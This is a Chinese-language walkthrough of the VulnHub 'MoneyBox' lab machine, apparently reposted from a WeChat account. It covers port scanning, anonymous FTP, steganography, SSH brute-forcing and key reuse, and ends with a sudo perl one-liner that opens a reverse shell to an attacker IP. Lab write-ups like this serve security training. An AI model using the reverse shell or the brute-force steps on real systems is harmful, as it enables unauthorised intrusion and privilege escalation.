MoneyBox靶场实战

admin 2024年12月10日17:57:07评论13 views字数 1236阅读4分7秒阅读模式

靶场下载地址:

http://www.vulnhub.com/entry/moneybox-1,653/#download

信息搜集

MoneyBox靶场实战

一、Nmap进行扫描

nmap -sP 192.168.128.0/24  #对自己的靶机网段进行存活探测,获取靶机地址nmap -T4 -A -p- 192.168.128.135  #对目标进行全端口扫描

MoneyBox靶场实战

通过端口扫描,发现目标开启了21、22、80端口

二、21端口利用

通过nmap扫描发现21端口允许匿名登录FTP的匿名登录一般有三种:1、 用户名:anonymous 密码:anonymous 或者 空2、 用户名:FTP 密码:FTP 或者 空3、 用户名:USER 密码:pass # 进行匿名登录ftp 192.168.128.135anonymous

MoneyBox靶场实战

通过匿名登录发现目录下存在一张图片,并且无法查看其他目录的内容# 下载图片进行查看get trytofind.jpg 图片如下:

MoneyBox靶场实战

猜测此文件可能存隐写使用steghide进行查看steghide extract -sf trytofind.jpg因需要输入密码,所以先放弃

MoneyBox靶场实战

、80端口web探测

MoneyBox靶场实战

对目标目录进行扫描,使用dirsearch工具:python dirsearch.py -u http://192.168.128.135/ -e *发现存在以下目录:http://192.168.128.135/blogs/

MoneyBox靶场实战

访问http://192.168.128.135/blogs/,查看源码发现一个新的目录S3cr3t-T3xt

MoneyBox靶场实战

对目录S3cr3t-T3xt进行访问,发现源码中存在密钥3xtr4ctd4t4

MoneyBox靶场实战

猜测此密钥为之前获取到的图片密钥发现图片隐写了data.txt文件查看此文件发现是一份邮件类似的内容,获取到用户名renu用户

MoneyBox靶场实战

MoneyBox靶场实战

尝试对renu用户ssh服务进行暴力破解爆破出renu用户的密码为:987654321

MoneyBox靶场实战

# 使用ssh连接登录目标服务器ssh renu@192.168.128.135通过常规的探测,未发现可提权的方法通过查看histor查看到目标使用私钥文件登录过其他用户

MoneyBox靶场实战

cd .sshssh -i id_rsa [email protected]成功登录到lily用户

MoneyBox靶场实战

经过探测发现lily存在无需密码验证即可sudo使用perl语言的权限

MoneyBox靶场实战

使用perl脚本进行提权反弹shellsudo perl -e 'use Socket;$i="192.168.128.133";$p=2333;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'成功提权,获取到flag

MoneyBox靶场实战

MoneyBox靶场实战

原文始发于微信公众号(渗透笔记):MoneyBox靶场实战

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年12月10日17:57:07
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   MoneyBox靶场实战https://cn-sec.com/archives/2497034.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息